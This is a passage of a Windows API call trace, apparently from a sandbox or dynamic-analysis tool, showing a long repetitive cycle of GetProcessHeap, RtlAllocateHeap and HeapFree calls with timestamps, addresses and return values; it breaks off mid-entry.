[0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0090.192] GetProcessHeap () returned 0xe30000 [0090.192] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.193] GetProcessHeap () returned 0xe30000 [0090.193] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.193] GetProcessHeap () returned 0xe30000 [0090.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.194] GetProcessHeap () returned 0xe30000 [0090.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.194] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.195] GetProcessHeap () returned 0xe30000 [0090.195] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.196] GetProcessHeap () returned 0xe30000 [0090.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0090.196] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0090.197] GetProcessHeap () returned 0xe30000 [0090.197] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0090.198] GetProcessHeap () returned 0xe30000 [0090.198] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0090.198] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0090.199] GetProcessHeap () returned 0xe30000 [0090.199] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.200] GetProcessHeap () returned 0xe30000 [0090.200] HeapFree (in: 